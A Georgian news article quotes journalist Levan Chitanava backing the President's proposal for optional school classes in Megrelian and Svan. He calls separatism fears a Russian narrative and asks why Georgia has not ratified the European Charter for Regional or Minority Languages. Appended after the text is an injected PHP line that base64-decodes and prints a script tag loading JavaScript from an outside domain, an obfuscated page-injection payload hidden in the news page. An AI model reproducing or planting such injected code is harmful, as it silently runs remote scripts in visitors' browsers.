celsiusi
ავერსი შნაიდერი
საქართველოს პრეზიდენტის მიერ 14 აპრილს, დედაენის დღისადმი მიძღვნილ მიმართვაში გახმოვანებული ინიციატივა, რომ  ყველა მსურველს უნდა ჰქონდეს სკოლაში ამ ენების არჩევით შესწავლის საშუალება და არ უნდა ვემორჩილებოდეთ ცრუ შიშებს! სრულიად მისასალმებელია და რა თქმა უნდა, ვიზიარებ", - ამის შესახებ ჟურნალისტმა ლევან ჭითანავამ ტელეკომპანია პირველის ეთერში განაცხადა. 
 
მისივე თქმით, აღნიშნულთან დაკავშირებით საზოგადოების ნაწილში არსებული შიშები, რუსული ნარატივის ნაწილია. 
 
"პრეზიდენტმა სწორად აღნიშნა, რომ საზოგადოების ნაწილში ჯერ კიდევ სუფევს ცრუ შიშები, სალომე ზურაბიშვილის მიერ გაჟღერებული ამ ინიციატივის შემდეგ დიდი ყურადღებით ვადევნებდი თვალ-ყურს, თუ რა რეაქციები მოჰყვებოდა საზოგადოების მხრივ. თქვენ იცით, რომ სოციალური მედიაში მიმდინარე დისკუსიები მეტ-ნაკლებად გამოხატავს საზოგადოების ნაწილის განწყობას ამა თუ იმ თემებზე, სამწუხაროდ, ვნახე საბჭოთა კავშირის მიერ მოხვეული აზრი და შიშები, საზოგადოების ნაწილი ჯერ კიდევ თვლის, რომ თუ სკოლებში არჩევითად იქნება მეგრული და სვანური ენები, ეს ხელს შეუწყობს სეპარატიზმს. არა მეგობრებო! ეს სწორედ რომ რურუსლი ნარატივია, ნუ გვეშინია იმაზე ხმამაღლად საუბარი, რაც ჩვენ ენას, ჩვენს უძველესს და არაჩვეულებრივ ქართულ ენას კიდევ უფრო გაამდიდრებს და მრავალფეროვანს გახდის", - განაცხადა ჟურნალისტმა ლევან ჭითანავამ.
 
მისივე თქმით, საქართველოს  რეგიონულ ან უმცირესობათა ენების შესახებ  ვეროპის საბჭოს მიერ შემუშავებულ ქარტიაზე ხელი აქვს მოწერილი, თუმცა პარლამენტს დღემდე არ ავქს დოკუმენტი რატიფიცირებული. 
 
"ჩვენ  - სახელმწიფომ მოვაწერეთ ამ ქარტიას ხელი, ანუ დათქმები მივიღეთ, მაგრამ აღსრულებაზე ჯერ კიდევ თავს ვიკავებთ. საინტერესოა, ამ წლების განმავლობაში, რატომ არ მოხდა ამ დოკუმენტის რატიფიცირება, საინტერესოა მივიღოთ განმარტებები შესაბამისი სტრუქტურებიდანაც. საქართველოს საკანომდებლო ორგანო რა საფრთხეებს ხედავს ამ დოკუმენტის დათქმებში და რატომ ჭიანურდება რატიფიცირება?!. ქარტიაში ვკითხულობთ, რომ განათლების სისტემის ყველა შესაბამის საფეხურზე რეგიონული და უმცირესობათა ენების სწავლებისა და შესწავლის სათანადო ფორმებისა და საშუალებების უზრუნველყოფაზე, ასევე საუბარია უნივერსიტეტებისა ან შესაბამის დაწესებულებებში რეგიონული ან უმცირესობათა ენების შესწავლისა და კვლევების ხელშეწყობაზე. ამ თემებზე დისკუსია უნდა გვქონდეს, კითვებზე პასუხები მივიღოთ". - განამარტავს ლევან ჭითანავა. 
 
 
 
 
1544
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");